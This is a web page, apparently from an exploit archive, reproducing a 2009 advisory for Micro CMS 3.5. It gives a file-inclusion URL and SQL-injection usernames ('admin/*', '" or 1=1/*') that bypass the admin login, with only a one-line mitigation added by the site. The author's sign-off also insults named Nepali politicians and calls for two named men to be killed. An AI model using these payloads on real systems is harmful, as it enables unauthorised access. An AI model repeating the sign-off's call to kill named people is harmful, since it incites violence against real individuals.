header-logo
Suggest Exploit
vendor:
Micro CMS
by:
learn3r hacker from Nepal
7.5
CVSS
HIGH
File Inclusion & SQL Injection
89, 79
CWE
Product Name: Micro CMS
Affected Version From: 3.5
Affected Version To: 3.5
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Micro CMS File inclusion Vuln & SQLi login bypass

A vulnerability exists in Micro CMS version 3.5 or lower which allows an attacker to bypass the login authentication by using a valid username followed by /* and any password. An attacker can also use a username of " or 1=1/* and any password to bypass the authentication.

Mitigation:

Disable register globals and use prepared statements for authentication.
Source

Exploit-DB raw data:

#################################################
#        Micro CMS File inclusion Vuln		#
#	 Micro CMS SQLi login bypass		#
#	 By learn3r hacker from Nepal		#
#	  damagicalhacker@gmail.com		#
#################################################

Affected version: v 3.5 or may be lower...

#############################################
#			File Inclusion Vuln				#
#############################################

Requires register globals to be on...

Vuln file: microcms-inlude.php
http://localhost/exploit/microcms/micro_cms_files/microcms-include.php?microcms_path=[FileInclusion]%00


#############################################
#			SQLi Login Bypass				#
#############################################

Vuln file: microcms-admin-login.php

Username: valid_username/*   [eg. admin/*]
Password: learn3r  [or whatever]

Or Username: " or 1=1/*
Password: learn3r  [or whatever]



Greetz to: sToRm and m0nkee from #gny, sam207 from www.sampctricks.blogspot.com, nepali boka, l@d0_put! HaCKeR and all...
FuCK MaKuNe, G!r!ja, Prachanda and all political leaders of Nepal
K!ll Upendra Yadav and Vijay Gachhedhaar

By learn3r aka cyb3r lord
Nepali Hackerz Are Not Dead!!!

# milw0rm.com [2009-09-16]

Navigation

Suggest Exploit

Services By CQR